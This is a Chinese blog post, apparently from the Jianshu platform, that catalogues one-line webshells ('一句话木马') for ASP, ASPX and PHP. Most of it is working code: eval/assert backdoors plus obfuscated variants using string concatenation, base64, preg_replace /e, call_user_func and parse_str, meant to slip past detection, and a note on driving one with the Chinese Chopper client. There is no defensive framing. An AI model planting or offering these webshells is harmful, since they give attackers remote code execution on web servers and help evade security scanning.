一句话木马

  • asp一句话木马是<%execute(request("value"))%>
  • aspx的一句话木马是<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>
  • php一句话木马是<?php @eval($_POST['pass'])?>
  • 一些特殊构造的php一句话木马

 <script language="pHp"></script>用这个来包含一句话木马


- \$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
\$hh("/[discuz]/e",$_POST['h'],"Access");  


- <?php @preg_replace("/[email]/e",$_POST['h'],"error"); ?>


- <?php assert(@$_POST['a']); ?>


call_user_func函数:
        <?php@call_user_func(assert,$_POST[a]);?>


file_put_contents函数:
       <?php $test=<?php $a=$_POST["cmd"];assert($a); ?>;file_put_contents("Trojan.php", $test);?>


base64编码: <?php $a=base64_decode("YXNzZXJ0");$a($_POST[a]);?>


.连接符:<?php $a="ass"."e";$b="r"."t";$c=$a.$b;$c($_POST[a]); ?>


parse_str函数:<?php $str=”a=assert”;parse_str($str);$a($_POST[a]);?>


<?php ($_=@$_GET[2]).@$_($_POST[1])?>在菜刀中传入GET参数 2=assert 密码为1
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • 在渗透测试的后期,为了维持权限。我们通常都会选择使用大小马或者通过添加账户等各种各样的方式给自己留个后门。但是事情...
    自我陶醉阅读 10,703评论 0 3
  • 什么是一句话木马 一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测...
    Waldo_cuit阅读 110,420评论 3 22
  • <?php @eval($_POST['attack']) ?>最简单的一句话木马。 原理:利用上传文件过滤不完善...
    FKTX阅读 14,696评论 1 5
  • 0*00 前言 现在针对web文件代码检测的安全类保护软件是越来越多了现在大多常见的厂商安全检测软件比如;安全狗,...
    池寒阅读 6,662评论 0 3
  • 原理是在<?php @eval($_POST['pass']);?>这样的一句话木马中,通过给pass这个值赋予内...
    ifqu阅读 10,950评论 0 0